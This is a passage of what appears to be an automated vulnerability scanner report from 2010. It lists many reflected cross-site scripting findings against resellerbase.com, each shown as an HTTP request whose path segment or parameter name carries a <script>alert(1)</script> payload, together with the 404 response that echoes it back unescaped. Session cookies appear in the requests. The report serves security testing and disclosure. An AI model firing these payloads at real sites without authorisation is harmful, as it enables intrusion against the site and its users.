Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images12f9b<script>alert(1)</script>c32db453f50/ was not found on this server.</p>
...[SNIP]...

2.2495. http://www.resellerbase.com/detail/37/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7a341<script>alert(1)</script>5c6ce34e44b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/?7a341<script>alert(1)</script>5c6ce34e44b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/?7a341<script>alert(1)</script>5c6ce34e44b=1 was not found on this server.</p>
...[SNIP]...

2.2496. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50ac1<script>alert(1)</script>3bcedcecce5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50ac1<script>alert(1)</script>3bcedcecce5/37/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50ac1<script>alert(1)</script>3bcedcecce5/37/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2497. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d9ec<script>alert(1)</script>ebb141b6d1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/376d9ec<script>alert(1)</script>ebb141b6d1c/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/376d9ec<script>alert(1)</script>ebb141b6d1c/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2498. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a50fb<script>alert(1)</script>c5f299e0c66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesa50fb<script>alert(1)</script>c5f299e0c66/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themesa50fb<script>alert(1)</script>c5f299e0c66/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2499. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 295c9<script>alert(1)</script>2ded033f074 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos295c9<script>alert(1)</script>2ded033f074/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos295c9<script>alert(1)</script>2ded033f074/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2500. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5c839<script>alert(1)</script>90c5f42c34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images5c839<script>alert(1)</script>90c5f42c34/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images5c839<script>alert(1)</script>90c5f42c34/rating/ was not found on this server.</p>
...[SNIP]...

2.2501. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4aff1<script>alert(1)</script>f73f57992f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating4aff1<script>alert(1)</script>f73f57992f6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating4aff1<script>alert(1)</script>f73f57992f6/ was not found on this server.</p>
...[SNIP]...

2.2502. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa863<script>alert(1)</script>86b051a5946 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/?aa863<script>alert(1)</script>86b051a5946=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/?aa863<script>alert(1)</script>86b051a5946=1 was not found on this server.</p>
...[SNIP]...

2.2503. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eda35<script>alert(1)</script>3db69b1120b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileda35<script>alert(1)</script>3db69b1120b/37/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileda35<script>alert(1)</script>3db69b1120b/37/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2504. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d00f<script>alert(1)</script>ad7984c2770 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/374d00f<script>alert(1)</script>ad7984c2770/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/374d00f<script>alert(1)</script>ad7984c2770/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2505. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a451c<script>alert(1)</script>0e5dd70e9a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themesa451c<script>alert(1)</script>0e5dd70e9a0/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themesa451c<script>alert(1)</script>0e5dd70e9a0/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2506. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b47d0<script>alert(1)</script>ee19d721d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosb47d0<script>alert(1)</script>ee19d721d9/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosb47d0<script>alert(1)</script>ee19d721d9/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2507. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 496a9<script>alert(1)</script>263f8ea2268 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images496a9<script>alert(1)</script>263f8ea2268/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images496a9<script>alert(1)</script>263f8ea2268/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2508. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d606b<script>alert(1)</script>63bdf3da716 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/ratingd606b<script>alert(1)</script>63bdf3da716/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/ratingd606b<script>alert(1)</script>63bdf3da716/4half.gif was not found on this server.</p>
...[SNIP]...

2.2509. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c275a<script>alert(1)</script>1d84eacf182 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/4half.gifc275a<script>alert(1)</script>1d84eacf182 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/4half.gifc275a<script>alert(1)</script>1d84eacf182 was not found on this server.</p>
...[SNIP]...

2.2510. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a49ac<script>alert(1)</script>04a8d81e02b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/4half.gif?a49ac<script>alert(1)</script>04a8d81e02b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/4half.gif?a49ac<script>alert(1)</script>04a8d81e02b=1 was not found on this server.</p>
...[SNIP]...

2.2511. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb125<script>alert(1)</script>5aa1aa6c11f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbb125<script>alert(1)</script>5aa1aa6c11f/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbb125<script>alert(1)</script>5aa1aa6c11f/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2512. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39ce5<script>alert(1)</script>9f5a48dbf45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3739ce5<script>alert(1)</script>9f5a48dbf45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3739ce5<script>alert(1)</script>9f5a48dbf45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2513. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69ccd<script>alert(1)</script>f0bb5199292 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes69ccd<script>alert(1)</script>f0bb5199292/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
